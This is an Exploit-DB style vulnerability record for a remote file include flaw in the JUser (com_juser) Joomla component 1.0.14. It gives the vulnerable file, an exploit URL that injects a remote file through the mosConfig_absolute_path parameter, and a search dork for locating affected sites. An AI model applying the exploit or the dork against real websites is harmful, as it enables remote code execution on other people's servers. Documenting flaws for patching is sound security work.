JUser Joomla Component 1.0.14 Remote File Include Vulnerability

vendor:

Joomla

by:

NoGe

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Joomla

Affected Version From: 1.0.14

Affected Version To: 1.0.14

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

JUser Joomla Component 1.0.14 Remote File Include Vulnerability

This vulnerability allows an attacker to include a remote file in the com_juser component of Joomla version 1.0.14. By exploiting this vulnerability, an attacker can execute malicious code on the target system.

Mitigation:

Update the com_juser component to the latest version or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

==================================================================================================================================

# JUser Joomla Component 1.0.14 Remote File Include Vulnerability

    Component     : com_juser version 1.0.14 - paid component
    Vendor        : www.joomlaequipment.com
    Discovered by : NoGe
    Contact       : pace[dot]noge[at]hotmail[dot]com
  
==================================================================================================================================

# Vulnerable file
  
    /administrator/components/com_juser/xajax_functions.php

    line 4 require ($mosConfig_absolute_path.'/administrator/components/com_juser/xajax/xajax_core/xajax.inc.php');



# Exploit

    http://localhost/path/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=[evilcode]



# D0rk

    inurl:com_juser

==================================================================================================================================

# Greetz

    all crew #papuahacker #baliemhackerlink #nyubicrew
    skulmatic OLiBekaS ulga Cungkee nyubi k1tk4t str0ke newbie
    yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ haliq
    http://kapukvalley.net member

==================================================================================================================================

# milw0rm.com [2007-11-19]